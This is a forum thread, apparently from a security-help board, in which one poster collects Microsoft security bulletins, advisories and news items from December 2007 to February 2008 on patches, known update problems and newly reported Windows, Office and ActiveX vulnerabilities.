December 18, 2007 (MSRC) - "...We have been investigating public reports of possible problems on systems that have installed the Cumulative Security Update for Internet Explorer (942615),
http://www.microsoft.com/technet/security/bulletin/ms07-069.mspx
released earlier this month. We have some information to share with you regarding the results of our investigation into these reports. First, I want to note the security update does protect against the vulnerabilities noted in the bulletin. If you are not experiencing issues noted in the below referenced Knowledge Base article, no action is needed. We have been working with a small number of customers that reported issues related to the installation of MS07-069. Specifically, on a Windows XP Service Pack 2 (SP2)-based computer, Internet Explorer 6 may stop responding when you try to a visit a web site. We’ve made an update to the Knowledge Base article for MS07-069, KB942615, which highlights the known issue.
http://support.microsoft.com/kb/942615
We have also added the following known issue Knowledge Base article KB946627. Because this occurs in a customized installation, this isn’t a widespread issue.
http://support.microsoft.com/kb/946627
Customers who believe they are affected can contact Customer Support Services at no charge using the PC Safety line at 1-866-PCSAFETY (North America). All customers, including those outside the U.S., can visit http://support.microsoft.com/security for assistance."
-----------------------------

- http://secunia.com/advisories/28036/
"...NOTE: This vulnerability is reportedly being actively exploited.
Successful exploitation of the vulnerabilities allows execution of arbitrary code when a user e.g. visits a malicious website..."

> http://www.microsoft.com/technet/security/Bulletin/MS07-069.mspx
• V1.2 (December 18, 2007): Bulletin updated to reflect a known issue; a change to the Removal Information text in the Windows Vista Reference Table in the Security Update Information section; and, a change to the File Information text in the Reference Table within the Security Update Information section for all affected operating systems...

:fear:

AplusWebMaster
2007-12-20, 13:29
What?

XPSP2 w/IE6 registry edit fix for MS07-069
- http://support.microsoft.com/kb/946627
Last Review: December 19, 2007
Revision: 1.0
"...WORKAROUND
Warning: Serious problems might occur if you modify the registry incorrectly by using Registry Editor or by using another method. These problems might require that you reinstall the operating system. Microsoft cannot guarantee that these problems can be solved. Modify the registry at your own risk..."

- http://blogs.msdn.com/ie/archive/2007/12/18/post-install-issues-with-ms07-069-ie6-on-xpsp2.aspx#6806843
December 19, 2007 - "...can Microsoft be serious that the solution is to edit each registry? Is this some sort of joke? It would be easier to have each user install Mozilla Firefox and stop using IE completely."

:sad:

AplusWebMaster
2007-12-21, 14:04
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS07-069.mspx
• V1.3 (December 20, 2007): Bulletin revised to reflect a new Security Update FAQ entry for a known issue documented in KB946627.

IE 6 crashes after you install (MS07-069) security update 942615 on a computer that is running Windows XPSP2
- http://support.microsoft.com/kb/946627/
Last Review: December 21, 2007
Revision: 2.0

:fear:

AplusWebMaster
2008-01-02, 19:54
FYI...

MS Office2003 SP3 disables older file formats
- http://it.slashdot.org/it/08/01/01/137257.shtml
January 02, 2008 - "In Service Pack 3 for Office 2003, Microsoft disabled support for many older file formats. If you have old Word, Excel, 1-2-3, Quattro, or Corel Draw documents, watch out! They did this because the old formats are 'less secure', which actually makes some sense, but only if you got the files from some untrustworthy source. Naturally, they did this by default, and then documented a mind-bogglingly complex workaround (KB 938810*) rather than providing a user interface for adjusting it, or even a set of awkward 'Do you really want to do this?' dialog boxes to click through. And of course because these are, after all, old file formats ... many users will encounter the problem only months or years after the software change, while groping around in dusty and now-inaccessible archives."
* http://support.microsoft.com/kb/938810/en-us
Last Review: December 6, 2007
Revision: 2.0

:nono::crazy:
------------------------------

- http://preview.tinyurl.com/2h5md8
January 05, 2008 (Computerworld) - "Microsoft Corp. apologized to a software rival yesterday for saying its file format posed a security risk and issued new tools to let users of Office 2003 SP3 unblock a host of barred file types. In a posting to his own blog*, David LeBlanc, a senior software development engineer with the Microsoft Office team, admitted the company's mistake in blaming insecure file formats, including the one used by CorelDraw... The revised support document** lists four downloads that users can run to unblock Word, Excel, PowerPoint and Corel files... "We'll try harder to make enabling older formats much more user-friendly in the future," he said."

* http://blogs.msdn.com/david_leblanc/archive/2008/01/04/office-sp3-and-file-formats.aspx
"...The .reg files you can use to change the security settings can be downloaded here..."

** http://support.microsoft.com/kb/938810/en-us
Last Review: January 4, 2008
Revision: 3.0
------------------------------
- http://preview.tinyurl.com/2gkwxt
January 10, 2008 (Computerworld) - "Microsoft Corp. will not post new tools that would allow users of Office 2007 to access blocked file formats, as it has done for customers running Office 2003 Service Pack 3 (SP3). It cited a lack of interest in such tools and said existing work-arounds accomplish the same thing... the Office Web site* explains how to set up a "trusted location," a special folder on a local or network drive. Files in a trusted folder aren't checked by Office 2007's security tools before opening, and thus the older file formats open normally..."
* http://office.microsoft.com/en-us/help/HA100319991033.aspx

:clown:

AplusWebMaster
2008-01-03, 22:57
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-jan.mspx
January 3, 2008
"...This is an advance notification of -two- security bulletins that Microsoft is intending to release on January 8, 2008... The security bulletins for this month are as follows, in order of severity:

Critical (1)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Important (1)

Microsoft Security Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Local Elevation of Privilege...
Affected Software: Windows...

Other...
Microsoft Windows Malicious Software Removal Tool
Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Non-Security, High-Priority Updates on MU, WU, and WSUS
For this month:
• Microsoft is planning to release -five- non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
• Microsoft is planning to release -two- non-security, high-priority updates for Windows on Windows Update (WU) and WSUS.
Note that this information pertains only to non-security, high-priority updates on Microsoft Update, Windows Update, and Windows Server Update Services released on the same day as the security bulletin summary. Information is not provided about non-security updates released on other days..."

AplusWebMaster
2008-01-08, 20:34
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-jan.mspx
January 8, 2008
"This bulletin summary lists security bulletins released for January 2008...

Critical (1)

Microsoft Security Bulletin MS08-001
Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (941644)
- http://www.microsoft.com/technet/security/bulletin/ms08-001.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...

Important (1)

Microsoft Security Bulletin MS08-002
Vulnerability in LSASS Could Allow Local Elevation of Privilege (943485)
- http://www.microsoft.com/technet/security/bulletin/ms08-002.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Local Elevation of Privilege...

Other...

Microsoft Windows Malicious Software Removal Tool
Microsoft has released an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Non-Security, High-Priority Updates on MU, WU, and WSUS
• Microsoft has released -five- non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
• Microsoft has released -two- non-security, high-priority updates for Windows on Windows Update (WU) and WSUS.

Note that this information pertains only to non-security, high-priority updates on Microsoft Update, Windows Update, and Windows Server Update Services released on the same day as the security bulletin summary. Information is not provided about non-security updates released on other days..."
---------------------

ISC Analysis
- http://isc.sans.org/diary.html?storyid=3819
Last Updated: 2008-01-08 18:25:59 UTC

AplusWebMaster
2008-01-09, 19:17
FYI...

Microsoft Security Advisory (943411)
Update to Improve Windows Sidebar Protection
- http://www.microsoft.com/technet/security/advisory/943411.mspx
January 8, 2008 - "An update is available for currently supported editions of the Windows Vista operating system. The update to improve Windows Sidebar Protection enables Windows Sidebar to help block gadgets from running in Sidebar. For more information about installing this update, see Microsoft Knowledge Base Article 943411*. For more information about how Windows Sidebar Protection helps block installed gadgets from running in Windows Sidebar, see Microsoft Knowledge Base Article 941411**..."

* http://support.microsoft.com/kb/943411

** http://support.microsoft.com/kb/941411

AplusWebMaster
2008-01-10, 17:35
The following bulletins have undergone a -minor- revision increment.

* MS07-064 - Critical
Vulnerabilities in DirectX Could Allow Remote Code Execution (941568)
- http://www.microsoft.com/technet/security/bulletin/ms07-064.mspx
- Reason for Revision: Bulletin updated to remove known issues notation. This update does not have any known issues.
- Originally posted: December 11, 2007
- Updated: January 9, 2008
- Bulletin Severity Rating: Critical
- Version: 1.3

* MS07-057 - Critical
Cumulative security update for Internet Explorer
- http://www.microsoft.com/technet/security/bulletin/ms07-057.mspx
- Reason for Revision: Revised to add a known issue.
(Known issues since original release of the bulletin:
• KB904710*: WinINet ignores the policies that you set when you create a custom administrative template file in Windows XP with Service Pack 2 - * http://support.microsoft.com/kb/904710 )
- Originally posted: October 9, 2007
- Updated: January 9, 2008
- Bulletin Severity Rating: Critical
- Version: 1.2

The following bulletins have undergone a -major- revision increment.

* MS07-042 - Critical
Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (936227)
- http://www.microsoft.com/technet/security/bulletin/ms07-042.mspx
- Reason for Revision: Bulletin updated: Added Microsoft Word Viewer 2003 as an affected product. Also added an Update FAQ clarifying the kill bit for Microsoft XML Parser 2.6 and its applicability to this security update.
- Originally posted: August 14, 2007
- Updated: January 9, 2008
- Bulletin Severity Rating: Critical
- Version: 3.0

.

AplusWebMaster
2008-01-11, 21:30
FYI...

Microsoft Security Advisory (945713)
Vulnerability in Web Proxy Auto-Discovery (WPAD) Could Allow Information Disclosure
- http://www.microsoft.com/technet/security/advisory/945713.mspx
Updated: January 9, 2008
Revisions:
• December 3, 2007: Advisory published.
• January 9, 2008: Advisory updated: The registry key for the Configure a Domain Suffix Search List workaround has been corrected to the proper key of SearchList.

.

AplusWebMaster
2008-01-13, 06:08
FYI... ThreatCon Level is 2

- http://www.symantec.com/avcenter/threatcon/learnabout.html
"The ThreatCon is currently at Level 2 in response to the disclosure of a critical remote vulnerability affecting the default configurations of Windows XP and Windows Vista. Nondefault configurations of Windows 2003 are also affected... The MS08-001 bulletin also addresses a remote kernel-based denial-of-service issue affecting nondefault configurations of Windows 2000, XP, and 2003. IBM Internet Security Systems, the team that discovered these kernel-based flaws, has recently released an official advisory* suggesting that the ICMP-based flaw, which Microsoft has considered a low-severity, denial-of-service issue, may in fact be exploitable to execute code. However, we have not confirmed this. Windows 2000 users who are not affected by the critical vulnerability may want to reevaluate their stance on patching the lower-severity issue in light of this new information. Multiple (3) Microsoft Windows TCP/IP Remote Code Execution and DoS Vulnerabilities
( * http://iss.net/threats/282.html ) The MS08-002 bulletin was also released to address a local privilege-escalation vulnerability affecting LSASS. Users are advised to review the Microsoft Security Bulletins and to apply the patches as soon as possible..."

* "...An attacker does not need to invoke any kind of user interaction to exploit this vulnerability. The lack of user interaction, widespread availability of the protocols, and the possibility of complete compromise of targeted systems means that administrators should treat this vulnerability as highly critical. The lack of user interaction makes this exploit a probable target for botnets, such as the Storm Worm. Administrators should monitor the signatures listed in the ISS Coverage section for any attempted worm or botnet activity. Administrators should also keep in mind that multicast traffic is usually received by multiple destinations, so a single stream of attack traffic would likely affect more than one target..."

:fear:

AplusWebMaster
2008-01-14, 19:08
FYI...

Windows Vista Application Compatibility Update
- http://support.microsoft.com/kb/943302
Last Review: January 11, 2008
Revision: 2.0

.

AplusWebMaster
2008-01-16, 13:44
FYI...

Microsoft Security Advisory (947563)
Vulnerability in Microsoft Excel Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/947563.mspx
January 15, 2008 - "Microsoft is investigating new public reports of a vulnerability in Microsoft Office Excel 2003 Service Pack 2, Microsoft Office Excel Viewer 2003, Microsoft Office Excel 2002, Microsoft Office Excel 2000, and Microsoft Excel 2004 for Mac. At this time, our initial investigation indicates that customers who are using Microsoft Office Excel 2007 or Microsoft Excel 2008 for Mac, or who have installed Microsoft Office Excel 2003 Service Pack 3 are not affected by this vulnerability. Microsoft is investigating the public reports and customer impact. Upon completion of this investigation, Microsoft will take the appropriate action... At this time, we are aware only of targeted attacks that attempt to use this vulnerability. Additionally, as the issue has not been publicly disclosed broadly, we believe the risk at this time to be limited...
Note: There are no known workarounds for Microsoft Office Excel 2002 or Microsoft Office Excel 2000 at this time..."

- http://isc.sans.org/diary.html?storyid=3854
Last Updated: 2008-01-16 02:54:29 UTC - "... The vulnerability is, according to the blog*, already actively exploited by targeted attacks. Excel 2003SP3 and Excel 2007 are not affected, but most other versions are."
* http://blogs.technet.com/msrc/archive/2008/01/15/msrc-blog-security-advisory-947563.aspx

- http://secunia.com/advisories/28506/
Release Date: 2008-01-16
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched...

:fear:

AplusWebMaster
2008-01-18, 15:38
FYI...

- http://preview.tinyurl.com/364gvn
January 17, 2008 (Infoworld) - "...The code is not available to the general public (Ed. note: "Yet"). It was released Thursday to security professionals who use Immunity's Canvas computer security testing software. It causes the Windows system to crash but does not let the attacker run malicious software on the victim's system... The bug is particularly troublesome for two reasons. First, it affects a widely used Windows component that is turned on by default. Worse, no user interaction is required to trigger the flaw, meaning that it could be exploited in a self-copying worm attack. MS patched the flaw in its MS08-001 update**, released last week, but it takes time for enterprise users to test and install Microsoft's patches..."
* http://seclists.org/dailydave/2008/q1/0017.html
17 Jan 2008

** http://www.microsoft.com/technet/security/bulletin/ms08-001.mspx
January 8, 2008 - Critical

- http://atlas.arbor.net/briefs/index#1659842965
January 17, 2008 - "...Analysis: Like we anticipated, an exploit is now available in limited release. However, this issue should not affect too many networks, as the attackers need subnet access to send the traffic to the victim..."

:fear:

AplusWebMaster
2008-01-24, 19:03
FYI...

Microsoft Security Bulletin MS08-001 – Critical
Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (941644)
- http://www.microsoft.com/technet/security/Bulletin/MS08-001.mspx
• V2.0 (January 23, 2008): Bulletin updated to add Windows Small Business Server 2003 Service Pack 2 as an affected product. Also added an FAQ to clarify that current Microsoft detection and deployment tools already correctly offer the update to Windows Small Business Server 2003 Service Pack 2 customers.

:fear:

AplusWebMaster
2008-01-25, 13:06
FYI... Microsoft Security Bulletin Re-Releases and Revisions

Microsoft Security Bulletin MS07-057 - Critical
Cumulative Security Update for Internet Explorer (939653)
- http://www.microsoft.com/technet/security/bulletin/ms07-057.mspx
• V1.0 (October 9, 2007): Bulletin published.
• V1.1 (October 10, 2007): Bulletin revised to correct the "What does the update do?" section for CVE-2007-3893.
• V1.2 (January 09, 2008): Bulletin revised to add a known issue.
• V1.3 (January 23, 2008): Bulletin revised to address rendering issues.

Microsoft Security Bulletin MS07-064 – Critical
Vulnerabilities in DirectX Could Allow Remote Code Execution (941568)
- http://www.microsoft.com/technet/security/bulletin/ms07-064.mspx
• V1.0 (December 11, 2007): Bulletin published.
• V1.1 (December 12, 2007): Bulletin updated to reflect that DirectX that ships on Windows 2000 is not supported by SMS 2.0 unless the Extended Security Update Inventory Tool (ESUIT) is used.
• V1.2 (December 19, 2007): Bulletin updated to reflect a change to the Removal Information text in the Windows Vista Reference Table portion of the Security Update Information section. Also removed the web-based mitigation from vulnerability CVE-2007-3901.
• V1.3 (January 9, 2008): Bulletin updated to remove known issues notation. This update does not have any known issues.
• V2.0 (January 23, 2008): Bulletin updated to reflect that the update for DirectX 9.0 also applies to DirectX 9.0b and DirectX 9.0c.

Microsoft Security Bulletin MS07-068 - Critical
Vulnerability in Windows Media File Format Could Allow Remote Code Execution (941569 and 944275)
- http://www.microsoft.com/technet/security/bulletin/ms07-068.mspx
• V1.0 (December 11, 2007): Bulletin published...
• V1.2 (January 23, 2008): Bulletin updated to add an FAQ regarding installing the updates for Windows Media Format Runtime 9.5 on Windows XP Professional x64 Edition.

Microsoft Security Bulletin MS08-001 – Critical
Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (941644)
- http://www.microsoft.com/technet/security/bulletin/ms08-001.mspx
• V1.0 (January 8, 2008): Bulletin published.
• V2.0 (January 23, 2008): Bulletin updated to add Windows Small Business Server 2003 Service Pack 2 as an affected product. Also added an FAQ to clarify that current Microsoft detection and deployment tools already correctly offer the update to Windows Small Business Server 2003 Service Pack 2 customers.

AplusWebMaster
2008-01-28, 10:44
FYI...

Microsoft Security Bulletin MS08-001 – Critical
Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (941644)
- http://www.microsoft.com/technet/security/bulletin/ms08-001.mspx
• V3.0 (January 25 2008): This bulletin was revised to clarify the impact of Windows Kernel TCP/IP/IGMPv3 and MLDv2 Vulnerability (CVE-2007-0069*) on supported editions of Windows Small Business Server 2003 and Windows Home Server. Also included is an explanation and clarification that current Microsoft detection and deployment tools already correctly offer the update to systems running Windows Small Business Server 2003 and Windows Home Server.
* http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0069

:fear::lip:

AplusWebMaster
2008-01-30, 19:05
FYI...

- http://preview.tinyurl.com/26fx8c
January 30, 2008 (Computerworld) - "... On Tuesday, Immunity Inc. updated a working exploit for the TCP/IP flaw spelled out Jan. 8 in Microsoft's MS08-001 security bulletin, and posted a Flash demonstration of the attack on its Web site. The exploit, which was released to customers of its CANVAS penetration testing software - but is not available to the public - was a revised version of code first issued two weeks ago... Other security companies reacted to the revamped attack code and Flash proof by issuing new alerts. Symantec Corp., for instance, sent a new warning to customers of its DeepSight threat network... It urged users who have not already deployed the patches Microsoft issued Jan. 8 to do (so) immediately..."

:fear:

AplusWebMaster
2008-02-01, 14:28
FYI...

- http://news.yahoo.com/s/ap/20080201/ap_on_hi_te/microsoft_yahoo_9
Feb. 1, 2008 - REDMOND, Wash. - "Microsoft Corp. is offering $44.6 billion in cash and stock for search engine operator Yahoo Inc. in a move to boost its competitive edge in the online services market. The unexpected announcement Friday comes as Microsoft, the world's biggest software company, seeks new ways to compete more efrfectively against the search and online advertising powerhouse Google Inc. In a letter to Yahoo's board of directors, Microsoft Chief Executive Steve Ballmer said the company will bid $31 per share, representing a 62 percent premium to Yahoo's closing stock price Thursday..."

- http://www.reuters.com/article/technologyNews/idUSWNAS894220080201?sp=true
Feb. 1, 2008 - "...Skeptics say Microsoft and Yahoo have very different corporate cultures and worry about a clash such as the one that marred AOL's $182 billion purchase of Time Warner in 2001, which is seen as the worst merger in recent history...."

:lip:

AplusWebMaster
2008-02-04, 23:45
FYI...

- http://secunia.com/advisories/28715
Last Update: 2008-02-05
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
Software: MySpace Uploader Control 1.x
...The vulnerability is confirmed in MySpaceUploader.ocx version 1.0.0.5 and reported in version 1.0.0.4. Other versions may also be affected.
Solution: Update to version 1.0.0.6. <<<

- http://secunia.com/advisories/28713/
Release Date: 2008-02-04
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
Software: Facebook Photo Uploader 4.x
...The vulnerability is confirmed in version 4.5.57.0. Other versions may also be affected.
Solution: Update to version 4.5.57.1. <<<

- http://secunia.com/advisories/28757/
Last Update: 2008-02-07
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: Yahoo! Music Jukebox 2.x...
NOTE: Working exploit code is publicly available.
The vulnerabilities are confirmed in Yahoo! Music Jukebox version 2.2.2.056. Other versions may also be affected...
Solution: Set the kill-bit for the affected ActiveX controls. <<<
Other References:
US-CERT VU#101676: http://www.kb.cert.org/vuls/id/101676
US-CERT VU#340860: http://www.kb.cert.org/vuls/id/340860
---------------------
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0623
release date: 2/6/2008 - YMP Datagrid ActiveX control (datagrid.dll)
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0624
release date: 2/6/2008 - YMP Datagrid ActiveX control (datagrid.dll)
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0625
release date: 2/6/2008 - MediaGrid ActiveX control (mediagrid.dll)

:fear:

AplusWebMaster
2008-02-07, 06:49
FYI...

- http://isc.sans.org/diary.html?storyid=3946
Last Updated: 2008-02-07 02:13:00 UTC - "Just a quick reminder to those in the corporate world and using WSUS. From a technet update email Volume 10, Issue 3: February 6, 2008

"...On February 12, 2008 Microsoft will release the Windows Internet Explorer 7 Installation and Availability update to Windows Server Update Services (WSUS). Windows Internet Explorer 7 Installation and Availability Update is a complete installation package that will upgrade machines running Internet Explorer 6 to Windows Internet Explorer 7. Customers who have configured WSUS to "auto-approve" Update Rollup packages will automatically upgrade machines running Internet Explorer 6 to Windows Internet Explorer 7 after February 12, 2008 and consequently, may want to read Knowledge Base article 946202 [links to http://go.microsoft.com/?linkid=8250930 ] to manage how and when this update is installed. For more on the Windows Internet Explorer 7 Installation and Availability Update, read Knowledge Base article 940767 [links to http://go.microsoft.com/?linkid=8250931 ]..."

There are still many organisations that use IE6 because of internal applications that may not work with IE 7 or alternate browsers. So if you use WSUS and have a need to stay with IE6, you should check out the knowledge base articles. Otherwise the 13th is not going to be a happy day for you."

AplusWebMaster
2008-02-07, 20:41
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-feb.mspx
Published: February 7, 2008 - "This is an advance notification of -twelve- security bulletins that Microsoft is intending to release on February 12, 2008...

> Critical (7)

Bulletin Identifier: Microsoft Security Bulletin 5
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Bulletin Identifier: Microsoft Security Bulletin 6
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Office, Visual Basic...

Bulletin Identifier: Microsoft Security Bulletin 7
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, VBScript, JScript...

Bulletin Identifier: Microsoft Security Bulletin 8
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Internet Explorer...

Bulletin Identifier: Microsoft Security Bulletin 10
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...

Bulletin Identifier: Microsoft Security Bulletin 11
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...

Bulletin Identifier: Microsoft Security Bulletin 12
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...


> Important (5)

Bulletin Identifier: Microsoft Security Bulletin 1
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service
Affected Software: Windows, Active Directory, ADAM...

Bulletin Identifier: Microsoft Security Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Windows...

Bulletin Identifier: Microsoft Security Bulletin 3
Maximum Severity Rating:Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Windows, IIS...

Bulletin Identifier: Microsoft Security Bulletin 4
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, IIS...

Bulletin Identifier: Microsoft Security Bulletin 9
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office, Works, Works Suite...

------------------------------

Microsoft Windows Malicious Software Removal Tool
Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Non-Security, High-Priority Updates on MU, WU, and WSUS
For this month:
• Microsoft is planning to release -seven- non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
• Microsoft is planning to release -two- non-security, high-priority updates for Windows on Windows Update (WU) and WSUS.

Note that this information pertains only to non-security, high-priority updates on Microsoft Update, Windows Update, and Windows Server Update Services released on the same day as the security bulletin summary. Information is not provided about non-security updates released on other days..."

AplusWebMaster
2008-02-12, 21:07
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-feb.mspx
February 12, 2008

"This bulletin summary lists security bulletins released for February 2008...

> Critical (6)

Microsoft Security Bulletin MS08-007
Vulnerability in WebDAV Mini-Redirector Could Allow Remote Code Execution (946026)
- http://www.microsoft.com/technet/security/bulletin/ms08-007.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin MS08-008
Vulnerability in OLE Automation Could Allow Remote Code Execution (947890)
- http://www.microsoft.com/technet/security/bulletin/ms08-008.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Office, Visual Basic...

Microsoft Security Bulletin MS08-009
Vulnerability in Microsoft Word Could Allow Remote Code Execution (947077)
- http://www.microsoft.com/technet/security/bulletin/ms08-009.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...

Microsoft Security Bulletin MS08-010
Cumulative Security Update for Internet Explorer (944533)
- http://www.microsoft.com/technet/security/bulletin/ms08-010.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Internet Explorer...

Microsoft Security Bulletin MS08-012
Vulnerabilities in Microsoft Office Publisher Could Allow Remote Code Execution (947085)
- http://www.microsoft.com/technet/security/bulletin/ms08-012.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...

Microsoft Security Bulletin MS08-013
Vulnerability in Microsoft Office Could Allow Remote Code Execution (947108)
- http://www.microsoft.com/technet/security/bulletin/ms08-013.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...


> Important (5)

Microsoft Security Bulletin MS08-003
Vulnerability in Active Directory Could Allow Denial of Service (946538)
- http://www.microsoft.com/technet/security/bulletin/ms08-003.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Windows, Active Directory, ADAM...

Microsoft Security Bulletin MS08-004
Vulnerability in Windows TCP/IP Could Allow Denial of Service (946456)
- http://www.microsoft.com/technet/security/bulletin/ms08-004.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Windows...

Microsoft Security Bulletin MS08-005
Vulnerability in Internet Information Services Could Allow Elevation of Privilege (942831)
- http://www.microsoft.com/technet/security/bulletin/ms08-005.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Windows, IIS...

Microsoft Security Bulletin MS08-006
Vulnerability in Internet Information Services Could Allow Remote Code Execution (942830)
- http://www.microsoft.com/technet/security/bulletin/ms08-006.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, IIS...

Microsoft Security Bulletin MS08-011
Vulnerabilities in Microsoft Works File Converter Could Allow Remote Code Execution (947081)
- http://www.microsoft.com/technet/security/bulletin/ms08-011.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office, Works, Works Suite..."
----------------------

ISC Analysis
- http://isc.sans.org/diary.html?storyid=3973
Last Updated: 2008-02-12 19:23:49 UTC

.

AplusWebMaster
2008-02-14, 02:08
FYI...

- http://isc.sans.org/diary.html?storyid=3973
Last Updated: 2008-02-13 18:25:13 UTC ...(Version: 3)
"...
MS08-007... WebDAV - Exploit instructions public... Critical
Vulnerability in WebDAV Mini-Redirector allows Remote Code Execution

MS08-010... IE - Exploit publicly available... PATCH NOW
Cumulative Security Update for Internet Explorer

MS08-011... Works - Exploit publicly available... Critical
Multiple vulnerabilities in Microsoft Works File Converter allow Remote Code Execution ..."

> http://forums.spybot.info/showpost.php?p=163889&postcount=33

:fear:

AplusWebMaster
2008-02-15, 06:18
FYI...

- http://isc.sans.org/diary.html?storyid=3973
Last Updated: 2008-02-15 01:51:27 UTC ...(Version: 4)

MS08-006 - IIS - Detailed discussion and DoS exploit made public - Important
Vulnerability in IIS Handling of HTML-encoded ASP Web Pages allows Remote Code Execution

> http://forums.spybot.info/showpost.php?p=163889&postcount=33


:fear:

AplusWebMaster
2008-02-20, 00:53
FYI...

- http://isc.sans.org/diary.html?storyid=3998
Last Updated: 2008-02-19 21:13:32 UTC - "We received information in regards to Microsoft Vista getting into a reboot loop after running the Windows Update..."

(Details at the URL above.)


:fear:

AplusWebMaster
2008-02-20, 17:46
FYI...

Vista SP1 pre-req "temporarily suspended"
- http://preview.tinyurl.com/yqvvoa
February 19, 2008 (Windows Vista blog) - "We've heard a few reports about problems customers may be experiencing as a result of KB937287*, the servicing stack update I blogged about last week, and I wanted to provide a quick update for you. Immediately after receiving reports of this error, we made the decision to temporarily suspend automatic distribution of the update to avoid further customer impact while we investigate possible causes... Customers who may be experiencing this issue can use system restore to correct it or contact 1-866-PC-Safety for help troubleshooting..."
* http://support.microsoft.com/kb/937287

:lip:

AplusWebMaster
2008-02-21, 18:29
FYI...

Dual-booting XP deletes Vista restore points
- http://windowssecrets.com/comp/080221#known0
2008-02-21 - "... booting to XP on a dual-boot system has the negative side-effect of deleting any Vista restore points, in addition to all but its latest backup file, and a Registry workaround* is required to prevent this..."
* http://support.microsoft.com/kb/926185

:sad::fear::buried:

AplusWebMaster
2008-02-22, 15:15
FYI...

Vista SP1 Blocks AV Programs
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=206801120
Feb. 21, 2008 - "A major update to Microsoft's Windows Vista operating system could leave computers vulnerable to hackers and malware as the service pack prevents several widely used antivirus programs from operating, the company said. The list of security products that Windows Vista Service Pack 1 blocks includes Zone Alarm Security Suite 7.1, Trend Micro Internet Security 2008, and BitDefender 10. It also blocks the 2008 version of the Jiangmin antivirus product. Microsoft said the blocks occur because the antivirus programs are not compatible with Vista SP1. "For reliability reasons, Microsoft blocks these programs from starting after you install Windows Vista SP1," the company said in a statement posted Wednesday on its support Web site*..."
* http://support.microsoft.com/kb/935796
Last Review: February 22, 2008
Revision: 3.0

:lip:

AplusWebMaster
2008-02-23, 13:17
FYI...

- http://preview.tinyurl.com/yqvvoa
February 19, 2008 (Windows Vista blog) - "We've heard a few reports about problems customers may be experiencing as a result of KB937287*..."
* http://support.microsoft.com/kb/937287

The update is not installed successfully, you receive a message, and the computer restarts when you try to install an update in Windows Vista
> http://support.microsoft.com/kb/949358/en-us
Last Review: February 22, 2008
Revision: 1.0
"...To avoid this problem, install update 937287 separately from all other updates. Install the update that applies to your version of Windows Vista to enable future updates to be installed successfully..."

:lip:

AplusWebMaster
2008-02-23, 20:50
- http://blog.washingtonpost.com/securityfix/2008/02/hackers_exploiting_facebook_my.html
